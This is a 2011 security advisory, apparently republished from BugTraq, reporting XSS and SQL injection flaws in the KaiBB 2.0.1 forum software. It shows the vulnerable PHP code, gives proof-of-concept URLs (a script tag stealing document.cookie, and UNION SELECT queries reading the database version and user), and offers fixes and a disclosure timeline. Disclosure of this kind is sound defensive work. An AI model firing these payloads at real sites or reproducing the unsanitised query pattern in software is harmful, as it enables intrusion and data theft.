Basic search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:27207
HistoryOct 24, 2011 - 12:00 a.m.

KaiBB 2.0.1 XSS and SQL Injection vulnerabilities

2011-10-2400:00:00
vulners.com
10

Advisory: KaiBB 2.0.1 XSS and SQL Injection vulnerabilities
Advisory ID: SSCHADV2011-027
Author: Stefan Schurtz
Affected Software: Successfully tested on KaiBB 2.0.1
Vendor URL: http://code.google.com/p/kaibb/
Vendor Status: informed
CVE-ID: -

==========================
Vulnerability Description

KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities

==================
Technical Details

sql injection vul code in 'kaibb/rss.php'

if ( isset($_GET['forum']))
{
$id = $secure->clean($_GET['forum']);
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics WHERE forum_id = '".$_GET['forum']."' ORDER BY id DESC LIMIT 15");
} else {
$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}

inc/function.php

class secure {

function clean($content) {
$content = mysql_real_escape_string(htmlspecialchars($content));
return $content;
}

xss vul code in 'inc/header.php'

$session_location = $_SERVER['REQUEST_URI'];

==================
Exploit

Cross-site Scripting

http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>

SQL Injection

http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a

=========
Solution

solution for the sql injection

if &#40; isset&#40;$_GET[&#39;forum&#39;]&#41;&#41;
{
   $id = $secure-&gt;clean&#40;$_GET[&#39;forum&#39;]&#41;;
   //$doGet = $db-&gt;query&#40;&quot;SELECT * FROM &quot; . $prefix . &quot;_topics WHERE forum_id = &#39;&quot;.$_GET[&#39;forum&#39;].&quot;&#39; ORDER BY id DESC LIMIT 15&quot;&#41;;
   $doGet = $db-&gt;query&#40;&quot;SELECT * FROM &quot; . $prefix . &quot;_topics WHERE forum_id = &#39;&quot;. $id .&quot;&#39; ORDER BY id DESC LIMIT 15&quot;&#41;;
} else {

$doGet = $db->query("SELECT * FROM " . $prefix . "_topics ORDER BY id DESC LIMIT 15");
}

solution for the xss vulnerability

//$session_location = $_SERVER['REQUEST_URI'];
$session_location = $_SERVER['SCRIPT_NAME'];

or

$session_location = htmlspecialchars($_SERVER['REQUEST_URI'],ENT_QUOTES);

====================
Disclosure Timeline

08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory
09-Oct-2011 - Post on BugTraq

========
Credits

Vulnerability found and advisory written by Stefan Schurtz.

===========
References

http://code.google.com/p/kaibb/
http://code.google.com/p/kaibb/issues/detail?id=2
http://www.rul3z.de/advisories/SSCHADV2011-027.txt